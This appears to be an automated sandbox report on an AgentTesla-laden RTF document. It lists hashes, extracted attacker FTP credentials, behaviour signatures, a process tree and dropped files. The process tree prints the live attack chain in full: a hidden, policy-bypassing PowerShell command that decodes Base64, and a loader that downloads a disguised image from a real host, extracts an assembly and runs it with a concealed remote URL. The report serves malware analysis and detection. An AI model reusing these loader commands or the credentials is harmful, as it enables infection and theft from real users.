Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags
    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    25-04-2024 09:37

General

  • Target
    morningworkingforgetbackwithentireprocessgetmebacktomesheisverydetailedinprojectgetunderstand___sheisverybeautifulsheisgreat.rtf
  • Size
    69KB
  • MD5
    bd7a9eba72d2a2a8cc97260ec906b842
  • SHA1
    ecf9f969b5f2b687aaf73c6173807cdaad151adb
  • SHA256
    6dd61f18a3cd350daf98d26c0ce32c935fae9a5458ee6e0d8f9fa843be227e02
  • SHA512
    8eb5705bba4a86df8b08d3c9b7db67fa382541469905e3196c5d95f02ab77da5bfc60ba2316ae3c9102190bbf8bf09fd642889916a68c4d0452f4f911177ee69
  • SSDEEP
    1536:7LPx4QfgceatqBb1NTaYIjlQYYmatL6ZDngEaSa7XYtHoylWg3HK:7LZ4QoTatqBb1NTaYIRjyL6ZbhaSarYy

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.fosna.net
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    =A+N^@~c]~#I

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Blocklisted process makes network request 10 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\morningworkingforgetbackwithentireprocessgetmebacktomesheisverydetailedinprojectgetunderstand___sheisverybeautifulsheisgreat.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2140
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Morninggetitbackkissing.js"
        2⤵
        • Blocklisted process makes network request
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:768
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778', 'https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.44446ezab/77.06.59.32//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"
            4⤵
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2960
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1864

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize: 68KB
      MD5: 29f65ba8e88c063813cc50a4ea544e93
      SHA1: 05a7040d5c127e68c25d81cc51271ffb8bef3568
      SHA256: 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
      SHA512: e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
      Filesize: 1KB
      MD5: a266bb7dcc38a562631361bbf61dd11b
      SHA1: 3b1efd3a66ea28b16697394703a72ca340a05bd5
      SHA256: df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
      SHA512: 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize: 344B
      MD5: 26166f57a86a4b9bd96ad668513d420c
      SHA1: b72df8743676284d569eaf7ea1ff5e94e52750ab
      SHA256: b7aa5fc66ddebf1fff44883df64daf40c0f80b336e4208a753c262649265916b
      SHA512: 86a17b6bb77621bc7206b5d883ccfc91b9120a335c6f84249f18b589937ca01f2b239199e37b42bba9d8353f0427b41a3c7805aaaac06f33078ad3a9bf97407f

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
      Filesize: 242B
      MD5: 3d7b7518da419480f20c8c0ea0f05972
      SHA1: 96f0e1c384197edf840909d6e7652774a2d55a24
      SHA256: 5dea024d22df548e2e966350c07f3d8427fec4251e4d7bba6fdfec29157a7575
      SHA512: a64bca3277b707a930f211c5de0db70ae687775b95857154fa318884894b9189418fc87e507350d44159f8752ea1a83f780eb6656ed0f88370d310ab9c42a302

    • C:\Users\Admin\AppData\Local\Temp\Tar1D03.tmp
      Filesize: 177KB
      MD5: 435a9ac180383f9fa094131b173a2f7b
      SHA1: 76944ea657a9db94f9a4bef38f88c46ed4166983
      SHA256: 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
      SHA512: 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize: 7KB
      MD5: 746c382c55860ed4de2c6c6ffb359463
      SHA1: 9887af848d747f6efb8ea2a934484aebcb00cc5c
      SHA256: f9a7b1371eb0d7d388879ad381c433232000c4b4f12cbf7877fbb9308ce2bb13
      SHA512: dba6949a3a0ecc469ecf19a414629ccd305eb8e58a3d95723afc91d7f56d6907c23148e86a9a95d8c59dbe4c14153ec238d107fe459e59466c2dfde21d56742b

    • C:\Users\Admin\AppData\Roaming\Morninggetitbackkissing.js
      Filesize: 5KB
      MD5: 8cf579f458819a211f06d8d115980db4
      SHA1: 07a073341bb83d3ca8bd3ce21edaa5c3e631087a
      SHA256: 65545c87941558733f8e159addc75b5f17e2597e05af3055a708fd49a6164f91
      SHA512: 5fd3280406cc5e4c72209ea9712ee905e27b7804dd56c80ae1c33896a837c517a43485658be3095926457a35000d7f5521d6711092b8ebdaf948cbb5308bd7d6

    • memory/768-56-0x0000000002B60000-0x0000000002BA0000-memory.dmp
      Filesize: 256KB
    • memory/768-55-0x0000000002B60000-0x0000000002BA0000-memory.dmp
      Filesize: 256KB
    • memory/768-54-0x000000006AF00000-0x000000006B4AB000-memory.dmp
      Filesize: 5.7MB
    • memory/768-168-0x000000006AF00000-0x000000006B4AB000-memory.dmp
      Filesize: 5.7MB
    • memory/768-53-0x000000006AF00000-0x000000006B4AB000-memory.dmp
      Filesize: 5.7MB
    • memory/1864-156-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize: 264KB
    • memory/1864-152-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize: 264KB
    • memory/1864-172-0x00000000049B0000-0x00000000049F0000-memory.dmp
      Filesize: 256KB
    • memory/1864-171-0x0000000067260000-0x000000006794E000-memory.dmp
      Filesize: 6.9MB
    • memory/1864-170-0x00000000049B0000-0x00000000049F0000-memory.dmp
      Filesize: 256KB
    • memory/1864-169-0x0000000067260000-0x000000006794E000-memory.dmp
      Filesize: 6.9MB
    • memory/1864-159-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
      Filesize: 4KB
    • memory/1864-157-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize: 264KB
    • memory/1864-163-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize: 264KB
    • memory/1864-161-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize: 264KB
    • memory/1864-154-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize: 264KB
    • memory/1864-165-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize: 264KB
    • memory/2136-0-0x000000002FF21000-0x000000002FF22000-memory.dmp
      Filesize: 4KB
    • memory/2136-167-0x00000000717FD000-0x0000000071808000-memory.dmp
      Filesize: 44KB
    • memory/2136-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize: 64KB
    • memory/2136-2-0x00000000717FD000-0x0000000071808000-memory.dmp
      Filesize: 44KB
    • memory/2960-63-0x000000006AF00000-0x000000006B4AB000-memory.dmp
      Filesize: 5.7MB
    • memory/2960-166-0x000000006AF00000-0x000000006B4AB000-memory.dmp
      Filesize: 5.7MB
    • memory/2960-62-0x000000006AF00000-0x000000006B4AB000-memory.dmp
      Filesize: 5.7MB
    • memory/2960-64-0x0000000002AB0000-0x0000000002AF0000-memory.dmp
      Filesize: 256KB
    • memory/2960-65-0x0000000002AB0000-0x0000000002AF0000-memory.dmp
      Filesize: 256KB